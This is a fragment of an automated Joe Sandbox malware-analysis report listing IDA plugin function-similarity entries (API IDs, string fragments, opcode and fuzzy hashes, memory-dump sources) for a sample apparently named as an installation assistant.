                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: `)L$|{J
                                          • API String ID: 3519838083-2198066115
                                          • Opcode ID: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                                          • Instruction ID: 6dd63674339beb37fc30e99c26eed3a48f2bb2b7ba327eddf54d6cc5821b265c
                                          • Opcode Fuzzy Hash: b90d896587ff69ee453e80d465c2f6f8c7b83dee329af48c731e2e2cf544007c
                                          • Instruction Fuzzy Hash: 84F08C72614014FFCB059F94DC04BDEBBB9FF49314F00802AF505A6660DBB56A15CBA8
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                           • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: H_prologctype
                                          • String ID: <oJ
                                          • API String ID: 3037903784-2791053824
                                          • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                          • Instruction ID: d1cbc3f55f4ea115ee9cb4b11e4491014c4e5b283c41fc5d4de0067444b0301d
                                          • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                          • Instruction Fuzzy Hash: 53E0ED32A15112EBDB049F88D820BDEF7B4EF81724F11001FE121A3B51EBB1A802CA90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                           • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: D)K$H)K$P)K$T)K
                                          • API String ID: 0-2262112463
                                          • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                          • Instruction ID: c16f4a97ac558b82f07df37884e47e04f4b9dc9e2e2653b14e69990c371a8376
                                          • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                          • Instruction Fuzzy Hash: 8051D3709042099BCF11DF95D840AEEB7B1FF0531CF11441AEA2567BA0FB75B949CB61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                           • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                           • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (?K$8?K$H?K$CK
                                          • API String ID: 0-3450752836
                                          • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                          • Instruction ID: 7258c1baebdacd21da56c82c784c1f3a3ecdb3e2d243a921696dca8874742e86
                                          • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                          • Instruction Fuzzy Hash: E5F030B06017009FC360CF06D54869BFBF4EB41759F50C91EE09A9BA40D3B8A50D8FB8